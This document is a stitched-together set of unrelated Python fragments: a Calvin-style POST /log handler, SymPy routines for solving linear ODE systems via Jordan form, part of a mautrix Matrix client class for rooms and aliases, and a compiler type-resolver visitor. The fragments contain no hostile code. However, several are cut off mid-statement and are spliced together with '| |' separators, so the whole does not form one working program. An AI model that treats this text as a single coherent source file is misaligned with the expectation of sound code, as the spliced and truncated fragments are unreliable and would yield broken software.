@handler(method="POST", path="/log")
@authentication_decorator
def handle_post_log(self, handle, connection, match, data, hdr):
"""
POST /log
Register for log events and set actor and event filter.
Body:
{
'user_id': <user_id> # Optional user id
'actors': [<actor-id>], # Actors to log, empty list for all
'events': [<event_type>] # Event types to log: actor_firing, action_result,
actor_new, actor_destroy, actor_migrate,
application_new, application_destroy
}
Response status code: OK or BAD_REQUEST
Response:
{
'user_id': <user_id>,
'epoch_year': <the year the epoch starts at Jan 1 00:00, e.g. 1970>
}
"""
status = calvinresponse.OK
actors = []
events = []
if data and 'user_id' in data:
user_id = data['user_id']
else:
user_id = calvinuuid.uuid("TRACE")
if user_id not in self.loggers:
if 'actors' in data and data['actors']:
actors = | |
if j >= i
else zeros(2, 2))
expJblock = Matrix(2*n, 2*n, lambda i,j: expJblock2[i//2,j//2][i%2,j%2])
blocks.append(exprt * expJblock)
for i in range(n):
vectors.append(re(chain[i]))
vectors.append(im(chain[i]))
else:
vectors.extend(chain)
fun = lambda i,j: t**(j-i)/factorial(j-i) if j >= i else 0
expJblock = Matrix(n, n, fun)
blocks.append(exp(e * t) * expJblock)
expJ = Matrix.diag(*blocks)
P = Matrix(N, N, lambda i,j: vectors[j][i])
return P, expJ
def _neq_linear_first_order_const_coeff_homogeneous(match_):
r"""
System of n first-order constant-coefficient linear homogeneous differential equations
.. math:: y'_k = a_{k1} y_1 + a_{k2} y_2 +...+ a_{kn} y_n; k = 1,2,...,n
or that can be written as `\vec{y'} = A . \vec{y}`
where `\vec{y}` is matrix of `y_k` for `k = 1,2,...n` and `A` is a `n \times n` matrix.
Since these equations are equivalent to a first order homogeneous linear
differential equation. So the general solution will contain `n` linearly
independent parts and solution will consist some type of exponential
functions. Assuming `y = \vec{v} e^{rt}` is a solution of the system where
`\vec{v}` is a vector of coefficients of `y_1,...,y_n`. Substituting `y` and
`y' = r v e^{r t}` into the equation `\vec{y'} = A . \vec{y}`, we get
.. math:: r \vec{v} e^{rt} = A \vec{v} e^{rt}
.. math:: r \vec{v} = A \vec{v}
where `r` comes out to be eigenvalue of `A` and vector `\vec{v}` is the eigenvector
of `A` corresponding to `r`. There are three possibilities of eigenvalues of `A`
- `n` distinct real eigenvalues
- complex conjugate eigenvalues
- eigenvalues with multiplicity `k`
1. When all eigenvalues `r_1,..,r_n` are distinct with `n` different eigenvectors
`v_1,...v_n` then the solution is given by
.. math:: \vec{y} = C_1 e^{r_1 t} \vec{v_1} + C_2 e^{r_2 t} \vec{v_2} +...+ C_n e^{r_n t} \vec{v_n}
where `C_1,C_2,...,C_n` are arbitrary constants.
2. When some eigenvalues are complex then in order to make the solution real,
we take a linear combination: if `r = a + bi` has an eigenvector
`\vec{v} = \vec{w_1} + i \vec{w_2}` then to obtain real-valued solutions to
the system, replace the complex-valued solutions `e^{rx} \vec{v}`
with real-valued solution `e^{ax} (\vec{w_1} \cos(bx) - \vec{w_2} \sin(bx))`
and for `r = a - bi` replace the solution `e^{-r x} \vec{v}` with
`e^{ax} (\vec{w_1} \sin(bx) + \vec{w_2} \cos(bx))`
3. If some eigenvalues are repeated. Then we get fewer than `n` linearly
independent eigenvectors, we miss some of the solutions and need to
construct the missing ones. We do this via generalized eigenvectors, vectors
which are not eigenvectors but are close enough that we can use to write
down the remaining solutions. For a eigenvalue `r` with eigenvector `\vec{w}`
we obtain `\vec{w_2},...,\vec{w_k}` using
.. math:: (A - r I) . \vec{w_2} = \vec{w}
.. math:: (A - r I) . \vec{w_3} = \vec{w_2}
.. math:: \vdots
.. math:: (A - r I) . \vec{w_k} = \vec{w_{k-1}}
Then the solutions to the system for the eigenspace are `e^{rt} [\vec{w}],
e^{rt} [t \vec{w} + \vec{w_2}], e^{rt} [\frac{t^2}{2} \vec{w} + t \vec{w_2} + \vec{w_3}],
...,e^{rt} [\frac{t^{k-1}}{(k-1)!} \vec{w} + \frac{t^{k-2}}{(k-2)!} \vec{w_2} +...+ t \vec{w_{k-1}}
+ \vec{w_k}]`
So, If `\vec{y_1},...,\vec{y_n}` are `n` solution of obtained from three
categories of `A`, then general solution to the system `\vec{y'} = A . \vec{y}`
.. math:: \vec{y} = C_1 \vec{y_1} + C_2 \vec{y_2} + \cdots + C_n \vec{y_n}
"""
eq = match_['eq']
func = match_['func']
fc = match_['func_coeff']
n = len(eq)
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
constants = numbered_symbols(prefix='C', cls=Symbol, start=1)
# This needs to be modified in future so that fc is only of type Matrix
M = -fc if type(fc) is Matrix else Matrix(n, n, lambda i,j:-fc[i,func[j],0])
P, J = matrix_exp_jordan_form(M, t)
P = simplify(P)
Cvect = Matrix(list(next(constants) for _ in range(n)))
sol_vector = P * (J * Cvect)
sol_vector = [collect(s, ordered(J.atoms(exp)), exact=True) for s in sol_vector]
sol_dict = [Eq(func[i], sol_vector[i]) for i in range(n)]
return sol_dict
def _matrix_is_constant(M, t):
"""Checks if the matrix M is independent of t or not."""
return all(coef.as_independent(t, as_Add=True)[1] == 0 for coef in M)
def _canonical_equations(eqs, funcs, t):
"""Helper function that solves for first order derivatives in a system"""
from sympy.solvers.solvers import solve
# For now the system of ODEs dealt by this function can have a
# maximum order of 1.
if any(ode_order(eq, func) > 1 for eq in eqs for func in funcs):
msg = "Cannot represent system in {}-order canonical form"
raise ODEOrderError(msg.format(1))
canon_eqs = solve(eqs, *[func.diff(t) for func in funcs], dict=True)
if len(canon_eqs) != 1:
raise ODENonlinearError("System of ODEs is nonlinear")
canon_eqs = canon_eqs[0]
canon_eqs = [Eq(func.diff(t), canon_eqs[func.diff(t)]) for func in funcs]
return canon_eqs
def neq_nth_linear_constant_coeff_match(eqs, funcs, t):
r"""
Returns a dictionary with details of the eqs if every equation is constant coefficient
and linear else returns None
Explanation
===========
This function takes the eqs, converts it into a form Ax = b where x is a vector of terms
containing dependent variables and their derivatives till their maximum order. If it is
possible to convert eqs into Ax = b, then all the equations in eqs are linear otherwise
they are non-linear.
To check if the equations are constant coefficient, we need to check if all the terms in
A obtained above are constant or not.
To check if the equations are homogeneous or not, we need to check if b is a zero matrix
or not.
Parameters
==========
eqs: List
List of ODEs
funcs: List
List of dependent variables
t: Symbol
Independent variable of the equations in eqs
Returns
=======
match = {
'no_of_equation': len(eqs),
'eq': eqs,
'func': funcs,
'order': order,
'is_linear': is_linear,
'is_constant': is_constant,
'is_homogeneous': is_homogeneous,
}
Dict or None
Dict with values for keys:
1. no_of_equation: Number of equations
2. eq: The set of equations
3. func: List of dependent variables
4. order: A dictionary that gives the order of the
dependent variable in eqs
5. is_linear: Boolean value indicating if the set of
equations are linear or not.
6. is_constant: Boolean value indicating if the set of
equations have constant coefficients or not.
7. is_homogeneous: Boolean value indicating if the set of
equations are homogeneous or not.
This Dict is the answer returned if the eqs are linear and constant
coefficient. Otherwise, None is returned.
"""
# Error for i == 0 can be added but isn't for now
# Removing the duplicates from the list of funcs
# meanwhile maintaining the order. This is done
# since the line in classify_sysode: list(set(funcs)
# cause some test cases to fail when gives different
# results in different versions of Python.
funcs = list(uniq(funcs))
# Check for len(funcs) == len(eqs)
if len(funcs) != len(eqs):
raise ValueError("Number of functions given is not equal to the number of equations %s" % funcs)
# ValueError when functions have more than one arguments
for func in funcs:
if len(func.args) != 1:
raise ValueError("dsolve() and classify_sysode() work with "
"functions of one variable only, not %s" % func)
# Getting the func_dict and order using the helper
# function
order = _get_func_order(eqs, funcs)
if not all(order[func] == 1 for func in funcs):
return None
else:
# TO be changed when this function is updated.
# This will in future be updated as the maximum
# order in the system found.
system_order = 1
# Not adding the check if the len(func.args) for
# every func in funcs is 1
# Linearity check
try:
canon_eqs = _canonical_equations(eqs, funcs, t)
As, b = linear_ode_to_matrix(canon_eqs, funcs, t, system_order)
# When the system of ODEs is non-linear, an ODENonlinearError is raised.
# When system has an order greater than what is specified in system_order,
# ODEOrderError is raised.
# This function catches these errors and None is returned
except (ODEOrderError, ODENonlinearError):
return None
A = As[1]
is_linear = True
# Constant coefficient check
is_constant = _matrix_is_constant(A, t)
# Homogeneous check
is_homogeneous = True if b.is_zero_matrix else False
match = {
'no_of_equation': len(eqs),
'eq': | |
# Copyright (c) 2022 <NAME>
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import annotations
from typing import Any, Awaitable, Callable, Iterable
import asyncio
from multidict import CIMultiDict
from mautrix.api import Method, Path
from mautrix.errors import MatrixRequestError, MatrixResponseError, MNotFound, MRoomInUse
from mautrix.types import (
JSON,
DirectoryPaginationToken,
EventID,
EventType,
Membership,
MemberStateEventContent,
PowerLevelStateEventContent,
RoomAlias,
RoomAliasInfo,
RoomCreatePreset,
RoomCreateStateEventContent,
RoomDirectoryResponse,
RoomDirectoryVisibility,
RoomID,
Serializable,
StateEvent,
StrippedStateEvent,
UserID,
)
from .base import BaseClientAPI
from .events import EventMethods
class RoomMethods(EventMethods, BaseClientAPI):
"""
Methods in section 8 Rooms of the spec. These methods are used for creating rooms, interacting
with the room directory and using the easy room metadata editing endpoints. Generic state
setting and sending events are in the :class:`EventMethods` (section 7) module.
See also: `API reference <https://spec.matrix.org/v1.1/client-server-api/#rooms-1>`__
"""
# region 8.1 Creation
# API reference: https://spec.matrix.org/v1.1/client-server-api/#creation
async def create_room(
self,
alias_localpart: str | None = None,
visibility: RoomDirectoryVisibility = RoomDirectoryVisibility.PRIVATE,
preset: RoomCreatePreset = RoomCreatePreset.PRIVATE,
name: str | None = None,
topic: str | None = None,
is_direct: bool = False,
invitees: list[UserID] | None = None,
initial_state: Iterable[StateEvent | StrippedStateEvent | dict[str, JSON]] | None = None,
room_version: str = None,
creation_content: RoomCreateStateEventContent | dict[str, JSON] | None = None,
power_level_override: PowerLevelStateEventContent | dict[str, JSON] | None = None,
) -> RoomID:
"""
Create a new room with various configuration options.
See also: `API reference <https://spec.matrix.org/v1.1/client-server-api/#post_matrixclientv3createroom>`__
Args:
alias_localpart: The desired room alias **local part**. If this is included, a room
alias will be created and mapped to the newly created room. The alias will belong
on the same homeserver which created the room. For example, if this was set to
"foo" and sent to the homeserver "example.com" the complete room alias would be
``#foo:example.com``.
visibility: A ``public`` visibility indicates that the room will be shown in the
published room list. A ``private`` visibility will hide the room from the published
room list. Defaults to ``private``. **NB:** This should not be confused with
``join_rules`` which also uses the word ``public``.
preset: Convenience parameter for setting various default state events based on a
preset. Defaults to private (invite-only).
name: If this is included, an ``m.room.name`` event will be sent into the room to
indicate the name of the room. See `Room Events`_ for more information on
``m.room.name``.
topic: If this is included, an ``m.room.topic`` event will be sent into the room to
indicate the topic for the room. See `Room Events`_ for more information on
``m.room.topic``.
is_direct: This flag makes the server set the ``is_direct`` flag on the
`m.room.member`_ events sent to the users in ``invite`` and ``invite_3pid``. See
`Direct Messaging`_ for more information.
invitees: A list of user IDs to invite to the room. This will tell the server to invite
everyone in the list to the newly created room.
initial_state: A list of state events to set in the new room. This allows the user to
override the default state events set in the new room. The expected format of the
state events are an object with type, state_key and content keys set.
Takes precedence over events set by ``is_public``, but gets overriden by ``name``
and ``topic keys``.
room_version: The room version to set for the room. If not provided, the homeserver
will use its configured default.
creation_content: Extra keys, such as ``m.federate``, to be added to the
``m.room.create`` event. The server will ignore ``creator`` and ``room_version``.
Future versions of the specification may allow the server to ignore other keys.
power_level_override: The power level content to override in the default power level
event. This object is applied on top of the generated ``m.room.power_levels`` event
content prior to it being sent to the room. Defaults to overriding nothing.
Returns:
The ID of the newly created room.
Raises:
MatrixResponseError: If the response does not contain a ``room_id`` field.
.. _Room Events: https://spec.matrix.org/v1.1/client-server-api/#room-events
.. _Direct Messaging: https://spec.matrix.org/v1.1/client-server-api/#direct-messaging
.. _m.room.create: https://spec.matrix.org/v1.1/client-server-api/#mroomcreate
.. _m.room.member: https://spec.matrix.org/v1.1/client-server-api/#mroommember
"""
content = {
"visibility": visibility.value,
"is_direct": is_direct,
"preset": preset.value,
}
if alias_localpart:
content["room_alias_name"] = alias_localpart
if invitees:
content["invite"] = invitees
if name:
content["name"] = name
if topic:
content["topic"] = topic
if initial_state:
content["initial_state"] = [
event.serialize() if isinstance(event, Serializable) else event
for event in initial_state
]
if room_version:
content["room_version"] = room_version
if creation_content:
content["creation_content"] = (
creation_content.serialize()
if isinstance(creation_content, Serializable)
else creation_content
)
# Remove keys that the server will ignore anyway
content["creation_content"].pop("room_version", None)
if power_level_override:
content["power_level_content_override"] = (
power_level_override.serialize()
if isinstance(power_level_override, Serializable)
else power_level_override
)
resp = await self.api.request(Method.POST, Path.v3.createRoom, content)
try:
return resp["room_id"]
except KeyError:
raise MatrixResponseError("`room_id` not in response.")
# endregion
# region 8.2 Room aliases
# API reference: https://spec.matrix.org/v1.1/client-server-api/#room-aliases
async def add_room_alias(
self, room_id: RoomID, alias_localpart: str, override: bool = False
) -> None:
"""
Create a new mapping from room alias to room ID.
See also: `API reference <https://matrix.org/docs/spec/client_server/r0.4.0.html#put-matrix-client-r0-directory-room-roomalias>`__
Args:
room_id: The room ID to set.
alias_localpart: The localpart of the room alias to set.
override: Whether or not the alias should be removed and the request retried if the
server responds with HTTP 409 Conflict
"""
room_alias = f"#{alias_localpart}:{self.domain}"
content = {"room_id": room_id}
try:
await self.api.request(Method.PUT, Path.v3.directory.room[room_alias], content)
except MatrixRequestError as e:
if e.http_status == 409:
if override:
await self.remove_room_alias(alias_localpart)
await self.api.request(Method.PUT, Path.v3.directory.room[room_alias], content)
else:
raise MRoomInUse(e.http_status, e.message) from e
else:
raise
async def remove_room_alias(self, alias_localpart: str, raise_404: bool = False) -> None:
"""
Remove a mapping of room alias to room ID.
Servers may choose to implement additional access control checks here, for instance that
room aliases can only be deleted by their creator or server administrator.
See also: `API reference <https://matrix.org/docs/spec/client_server/r0.4.0.html#delete-matrix-client-r0-directory-room-roomalias>`__
Args:
alias_localpart: The room alias to remove.
raise_404: Whether 404 errors should be raised as exceptions instead of ignored.
"""
room_alias = f"#{alias_localpart}:{self.domain}"
try:
await self.api.request(Method.DELETE, Path.v3.directory.room[room_alias])
except MNotFound:
if raise_404:
raise
# else: ignore
async def resolve_room_alias(self, room_alias: RoomAlias) -> RoomAliasInfo:
"""
Request the server to resolve a room alias to a room ID.
The server will use the federation API to resolve the alias if the domain part of the alias
does not correspond to the server's own domain.
See also: `API reference <https://spec.matrix.org/v1.1/client-server-api/#get_matrixclientv3directoryroomroomalias>`__
Args:
room_alias: The room alias.
Returns:
The room ID and a list of servers that are aware of the room.
"""
content = await self.api.request(Method.GET, Path.v3.directory.room[room_alias])
return RoomAliasInfo.deserialize(content)
# endregion
# region 8.4 Room membership
# API reference: https://spec.matrix.org/v1.1/client-server-api/#room-membership
async def get_joined_rooms(self) -> list[RoomID]:
"""Get the list of rooms the user is in."""
content = await self.api.request(Method.GET, Path.v3.joined_rooms)
try:
return content["joined_rooms"]
except KeyError:
raise MatrixResponseError("`joined_rooms` not in response.")
# region 8.4.1 Joining rooms
# API reference: https://spec.matrix.org/v1.1/client-server-api/#joining-rooms
async def join_room_by_id(
self,
room_id: RoomID,
third_party_signed: JSON = None,
extra_content: dict[str, Any] | None = None,
) -> RoomID:
"""
Start participating in a room, i.e. join it by its ID.
See also: `API reference <https://spec.matrix.org/v1.1/client-server-api/#post_matrixclientv3roomsroomidjoin>`__
Args:
room_id: The ID of the room to join.
third_party_signed: A signature of an ``m.third_party_invite`` token to prove that this
user owns a third party identity which has been invited to the room.
extra_content: Additional properties for the join event content.
If a non-empty dict is passed, the join event will be created using
the ``PUT /state/m.room.member/...`` endpoint instead of ``POST /join``.
Returns:
The ID of the room the user joined.
"""
if extra_content:
await self.send_member_event(
room_id, self.mxid, Membership.JOIN, extra_content=extra_content
)
return room_id
content = await self.api.request(
Method.POST,
Path.v3.rooms[room_id].join,
{"third_party_signed": third_party_signed} if third_party_signed is not None else None,
)
try:
return content["room_id"]
except KeyError:
raise MatrixResponseError("`room_id` not in response.")
async def join_room(
self,
room_id_or_alias: RoomID | RoomAlias,
servers: list[str] | None = None,
third_party_signed: JSON = None,
max_retries: int = 4,
) -> RoomID:
"""
Start participating in a room, i.e. join it by its ID or alias, with an optional list of
servers to ask about the ID | |
<gh_stars>1-10
import ast
import builtins
import basetype
def chooseType(left, right):
# print('chooseType', left, right, left.getType(), right.getType())
return left.getType()
class TypeMatcher(ast.AstVisitor):
def __init__(self):
ast.AstVisitor.__init__(self)
self.opname = 'matchType'
self.name = 'typeMatcher'
def visit(self, astree):
return astree
def matchType_UserType(self, ut, gtype, types):
# self.logger.debug('matchType_UserType', ut, gtype, types)
assert(isinstance(gtype, ast.UserType))
assert(len(gtype.path) == 1)
for t in types:
if t == gtype.path[0]:
# self.logger.debug('matchType_UserType match', ut, gtype, types, t)
return t, ut
assert(False)
class Resolver(ast.AstVisitor):
def __init__(self):
ast.AstVisitor.__init__(self)
self.opname = 'resolve'
self.name = 'resolver'
def visit(self, astree):
# self.logger.debug('Resolver.visit', self, astree, len(astree.definitions))
self.ast = astree
for i in self.ast.imports:
i.visit(self)
for d in self.ast.definitions:
d.visit(self)
return self.ast
def resolve_Import(self, i):
# self.logger.debug('resolve_Import', i, i.path)
pass
def resolveAttr_EnumDef(self, enumdef, attr):
ret = enumdef.findMember(attr.ref)
assert ret, (enumdef, attr, ret, attr.ref, attr.object, enumdef.symbols)
return ret
def resolveAttr_ClassDef(self, cls, attr):
ret = cls.findMember(attr.ref)
assert ret, (cls, attr, ret, attr.ref, attr.object, cls.functions, cls.vars, cls.symbols)
return ret
def resolve_ClassDef(self, cls):
# self.logger.debug('resolve_ClassDef', cls, cls.name, len(cls.definitions))
if cls.isProtoType():
for p in cls.genericParams[:]:
p.visit(self)
return
if cls.resolved:
return cls
cls.resolved = True
for s in cls.scripts:
# self.logger.debug('resolve_ClassDef script', s)
s.visit(self)
for b in cls.bases:
b.visit(self)
# self.logger.debug('resolve_ClassDef base', cls, cls.name, b)
for s in b.getTarget().scripts:
if s.getTarget().inherit:
# self.logger.debug('resolve_ClassDef base script', s, s.caller, s.args)
s2 = ast.Script(s.caller.path, s.args, s.namedArgs)
cls.scripts.append(s2)
s2.setOwner(cls)
s2.visit(self)
for d in cls.definitions:
# self.logger.debug('resolve_ClassDef def', cls.name, d)
d.visit(self)
def resolve_FuncDef(self, func):
# self.logger.debug('resolve_FuncDef', func.name, func.resolved, func.cls, func)
assert func.owner, (func, func.owner)
owner = func.owner
assert isinstance(owner, ast.ClassDef) or isinstance(owner, ast.CodeUnit) or isinstance(owner, ast.ExtensionDef), 'resolve_ClassDef owner is invalid: %s %s' % (owner, func)
#assert isinstance(owner, ast.ClassDef) or isinstance(owner, ast.CodeUnit), 'resolve_FuncDef owner=%s' % owner
if func.resolved:
# assert func.spec.returnType, (func.name, func.spec.returnType, func)
return
func.resolved = True
# self.logger.debug('resolve_FuncDef start', func, func.name)
for param in func.spec.params:
param.visit(self)
if func.cls is None and isinstance(owner, ast.ClassDef):
func.cls = owner
func.spec.visit(self)
func.body.visit(self)
if func.spec.returnType is None:
if len(func.body.statements) == 0:
func.spec.returnType = ast.makePrimitiveType('void')
else:
lastStmt = func.body.statements[-1]
# self.logger.debug('resolve_FuncDef rettype', func.name, func, lastStmt)
if isinstance(lastStmt, ast.Return) and lastStmt.value:
assert func.spec.returnType is None, (func, func.spec)
func.spec.returnType = lastStmt.value.getType().clone()
# self.logger.debug('resolve_FuncDef rettype with return', lastStmt, lastStmt.value.getType(), func, func.spec)
else:
func.spec.returnType = ast.makePrimitiveType('void')
self.setupNewItem(func.spec.returnType, func.spec, True)
if func.spec.returnType is None:
assert False, (func, func.spec)
# self.logger.debug('resolve_FuncDef end', func.name, func.resolved, func.spec.returnType, func.cls, func)
def resolve_ForEachStatement(self, stmt=None):
stmt.collection.visit(self)
if stmt.item.getType() is None:
stmt.item.setupType(stmt.collection.getType().getItemType(), self)
stmt.body.visit(self)
def resolve_ForEachDictStatement(self, stmt):
# self.logger.debug('resolve_ForEachDictStatement', stmt, stmt.collection, stmt.collection.getType(), stmt.key, stmt.value)
stmt.collection.visit(self)
# self.logger.debug('resolve_ForEachDictStatement type', stmt, stmt.collection, stmt.collection.getType(), stmt.key, stmt.value)
if stmt.key.getType() is None:
stmt.key.setupType(stmt.collection.getType().getKeyType(), self)
if stmt.value.getType() is None:
stmt.value.setupType(stmt.collection.getType().getValueType(), self)
stmt.key.visit(self)
stmt.value.visit(self)
# self.logger.debug('resolve_ForEachDictStatement', stmt.collection.getTarget())
stmt.body.visit(self)
def resolve_Script(self, script):
sfunc = self.ast.project.findScript(script.caller.path)
# self.logger.debug('resolve_Script', script, script.caller, sfunc, script.caller.path)
script.setTarget(sfunc)
sfunc.visit(self, script)
def resolve_FuncSpec(self, funcspec):
if funcspec.returnType:
funcspec.returnType.visit(self)
for param in funcspec.params:
param.visit(self)
funcspec.setupTypeClass(basetype.FunctionClass(funcspec), self)
# self.logger.debug('resolve_FuncSpec end', funcspec, funcspec.returnType, funcspec.params)
def resolve_TupleVarDef(self, var):
if var.initial:
var.initial.visit(self)
if var.type is None:
var.type = var.initial.getType()
if var.type:
assert isinstance(var.type, ast.UserType) and var.type.fullpath == 'Tuple', ('resolve_TupleVarDef', var, var.type, var.initial)
etypes = var.type.getTarget().instantiation.genericArgs[0].types
for i in range(len(var.vars)):
var.vars[i].setExpectedType(etypes[i])
var.vars[i].visit(self)
def resolve_SingleVarDef(self, var):
# self.logger.debug('resolve_SingleVarDef', var.name, var, var.owner, var)
owner = var.owner
assert owner == var.owner
assert var.getType() is None or isinstance(var.getType(), ast.Type), (var, var.getType(), var.expectedType, var.initial)
if var.initial:
# self.logger.debug('resolve_SingleVarDef initial', var, var.name, var.initial)
var.initial.visit(self)
# self.logger.debug('resolve_SingleVarDef initial2', var, var.initial, var.initial.getType())
if var.getType():
var.getType().visit(self)
# self.logger.debug('resolve_SingleVarDef type', var, var.getType(), var.getTypeClass())
else:
# self.logger.debug('resolve_SingleVarDef initial type', var, var.initial, var.getOwnerFunc())
assert (var.initial and var.initial.getType()) or var.expectedType, (var, var.getOwnerFunc(), var.getOwnerFullContext(), var.initial, var.getType())
var.setupType((var.initial.getType() if var.initial else None) or var.expectedType, self)
assert isinstance(var.getType(), ast.Type), (var, var.getType(), var.expectedType, var.initial)
# self.logger.debug('resolve_SingleVarDef initial type', var, var.getType())
# self.logger.debug('resolve_SingleVarDef type_class', var.name, var.getTypeClass(), id(var), var.getType().getTarget())
assert var.getType() is None or isinstance(var.getType(), ast.Type), (var, var.getType(), var.expectedType, var.initial)
if hasattr(var.getTypeClass(), 'rettype'):
var.returnType = var.getTypeClass().returnType
assert var.getType(), var
assert var.getTypeClass(), ('resolve_SingleVarDef', var, var.getType(), var.getOwnerFunc(), var.getOwnerClass())
assert var.getType().getTypeClass(), var.getType()
def resolve_GenericExpr(self, expr):
expr.visitChildren(self)
target = expr.base.getTarget()
target = target.instantiate(expr.genericArgs, self)
# self.logger.debug('resolve_GenericExpr target', expr, expr.base, expr.target, target)
assert target
expr.target = target
def resolve_ConstSpec(self, var):
# self.logger.debug('resolve_ConstSpec', var.name, var, var.owner)
assert owner == var.owner
if var.initial:
# self.logger.debug('resolve_ConstSpec initial', var, var.name, var.initial)
var.initial.visit(self)
# self.logger.debug('resolve_ConstSpec initial2', var, var.initial, var.initial.getType())
if var.getType():
var.getType().visit(self)
# self.logger.debug('resolve_ConstSpec type', var, var.getType(), var.getTypeClass())
else:
assert(var.initial and var.initial.getType())
self.ast.setType(var, var.initial.getType())
var.getType().visit(self)
# self.logger.debug('resolve_ConstSpec initial type', var, var.getType())
# self.logger.debug('resolve_ConstSpec type_class', var.name, var.getTypeClass(), id(var))
if hasattr(var.getTypeClass(), 'rettype'):
var.returnType = var.getTypeClass().returnType
assert var.getType(), var
assert var.getTypeClass(), var.getType()
assert var.getType().getTypeClass(), var.getType()
def resolveCall_AttrRef(self, attrref, callinfo):
# self.logger.debug('resolveCall_AttrRef', attrref, callinfo, callinfo.caller, callinfo.caller.getTarget())
callinfo.caller.getTarget().resolveCall(self, callinfo)
def resolveCall_SingleVarDef(self, var, callinfo):
# self.logger.debug('resolveCall_SingleVarDef', var, callinfo)
pass
def resolveCall_Identifier(self, idvar, callinfo):
# self.logger.debug('resolveCall_Identifier', idvar, callinfo, callinfo.caller.getTarget())
if callinfo.caller.getTarget():
callinfo.caller.getTarget().resolveCall(self, callinfo)
def resolve_Return(self, stmt):
rettype = stmt.getOwnerFunc().spec.returnType
# self.logger.debug('resolve_Return', stmt.values, stmt, rettype, stmt.getOwnerFunc(), stmt.getOwnerClass())
stmt.expected_type = rettype
expr = stmt.value
# self.logger.debug('resolve_Return expr', stmt, expr, rettype)
assert not isinstance(expr, list), ('resolve_Return value is list', expr, rettype, stmt, stmt.getOwnerFunc())
if expr is not None:
expr.setExpectedType(rettype)
expr.visit(self)
# self.logger.debug('resolve_Return need_return expr', expr, expr.getTarget())
def resolve_Call(self, callinfo):
# self.logger.debug('resolve_Call', callinfo, callinfo.caller, callinfo.caller.getTarget(), callinfo.args, callinfo.getType(), callinfo.getOwnerFunc())
callinfo.caller.visit(self)
assert callinfo.caller.getTarget(), ('resolve_Call caller.target', callinfo, callinfo.caller, callinfo.caller.getTarget(), callinfo.args, callinfo.getType(), callinfo.getOwnerFunc())
callinfo.caller.getTarget().visit(self)
callinfo.caller.getTarget().resolveCall(self, callinfo)
func = callinfo.caller.getTarget()
spec = callinfo.getSpec()
assert func.getSpec() is not None and spec, ('resolve_Call', callinfo, func, func.spec, spec)
# self.logger.debug('resolve_Call spec', callinfo, callinfo.caller, callinfo.args, spec, callinfo.getType())
for i in range(len(callinfo.args)):
arg = callinfo.args[i]
# self.logger.debug('resolve_Call arg %d' % i, arg, spec)
# self.logger.debug('resolve_Call arg %d' % i, arg, callinfo.caller, spec, arg.getType(), spec.params[i].getType() if i < len(spec.params) else None)
expectedArgType = spec.params[i].getType() if i < len(spec.params) else None
# self.logger.debug('resolve_Call arg visit', i, arg, callinfo.caller, expectedArgType, spec.params)
arg.setExpectedType(expectedArgType)
arg.visit(self)
if i < len(spec.params):
param = spec.params[i]
if arg.getType() is None:
assert False, (self, arg, param, arg.getType(), param.getType())
self.ast.setType(arg, param.getType())
if arg.getType() is None:
pass
# self.logger.debug('resolve_Call arg.resolve', callinfo, arg, arg.getTarget(), arg.getType(), arg.getType().getTarget())
assert arg.getType(), arg
for arginfo in callinfo.namedArgs:
name = arginfo.name
arg = arginfo.value
func = callinfo.caller.getTarget()
if isinstance(func, ast.ClassDef):
field = func.findLocalSymbol(name)
assert field, ('resolve_Call field', func, name, field, callinfo.getOwnerFunc())
arg.setExpectedType(field.getType())
arg.visit(self)
assert arg.getType(), ('resolve_Call named_arg arg.getType() is None:%s,%s' % (name, arg), arg.getOwnerFunc(), arg.getOwnerClass())
assert callinfo.getType(), (callinfo, spec)
def resolveAttr_AstNode(self, node, expr):
# self.logger.debug('resolveAttr_AstNode', node, expr, node.getTypeClass())
return node.getTypeClass().resolveAttr(self, expr) if node.getTypeClass() else None
def resolve_AttrRef(self, expr):
# self.logger.debug('resolve_AttrRef', expr, expr.object, expr.ref, expr.getOwnerFunc(), expr.object.getType(), expr.getOwnerFunc())
expr.object.visit(self)
expr.target = expr.object.resolveAttr(self, expr)
# self.logger.debug('resolve_AttrRef target 2', expr, expr.object, expr.ref, expr.target, expr.object.getType(), expr.object.getTypeClass(), expr.getOwner())
assert expr.getTarget(), ('resolve_AttrRef no target', expr, expr.object, expr.object.getType(), expr.ref, expr.getOwner())
if expr.getTarget():
expr.getTarget().visit(self)
return expr
def resolve_Identifier(self, expr):
owner = expr.owner
expr.target = owner.findSymbol(expr.name)
# self.logger.debug('resolve_Identifier target', expr, expr.name, expr.getTarget())
assert expr.getTarget(), (expr, expr.getTarget(), expr.getOwnerFunc())
expr.getTarget().visit(self)
assert expr.getType(), (expr, expr.getTarget(), expr.getTarget().getType())
# assert expr.getType().getTarget(), (expr, expr.getType(), expr.getTarget(), expr.getTarget().getType(), expr.owner, expr.getOwnerFunc())
if expr.name == 'funcname':
assert expr.getType(), expr
assert expr.getTypeClass(), expr
assert expr.getType().getTypeClass(), expr.getType()
# self.logger.debug('resolve_Identifier target', expr, expr.name, expr.getTarget(), expr.getType(), expr.getTypeClass())
def resolve_Assignment(self, expr=None):
# self.logger.debug('resolve_Assignment', expr, expr.targets, expr.values, expr.owner)
expr.visitChildren(self)
for i in range(len(expr.values)):
val = expr.values[i]
if isinstance(val, ast.ListLiteral) and (not val.values) and val.getType() is None:
val.expectedType = expr.targets[i].getType()
def resolve_NamedExpressionItem(self, item):
# assert False, (item, item.owner, item.value)
item.visitChildren(self)
def resolve_EnumDef(self, expr):
pass
def resolve_Break(self, expr):
pass
def resolve_Continue(self, expr):
pass
def resolve_This(self, expr):
# self.logger.debug('resolve_This', expr.owner, expr.getOwnerFunc(), expr.getOwnerClass())
if expr.getType() is None:
expr.setupType(ast.UserType([expr.getOwnerClass().name]), self)
def resolve_ListLiteral(self, literal):
# self.logger.debug('resolve_ListLiteral', self, literal, literal.owner, literal.expectedType, literal.getOwnerFunc())
if literal.getType() is None:
for val in literal.values:
val.visit(self)
if literal.values:
# assert not isinstance(literal.values[0].getType(), ast.ListType), literal.values[0]
assert not isinstance(literal.values[0].getType(), ast.ClassDef), literal.values[0]
# assert literal.values[0].getType(), literal.values[0]
if literal.values[0].getType():
literal.setupType(ast.createListType(literal.values[0].getType().clone()), self)
else:
if literal.expectedType:
literal.setupType(literal.expectedType, self)
else:
for val in literal.values:
val.visit(self)
literal.getType().visit(self)
return literal
def resolve_TupleLiteral(self, literal):
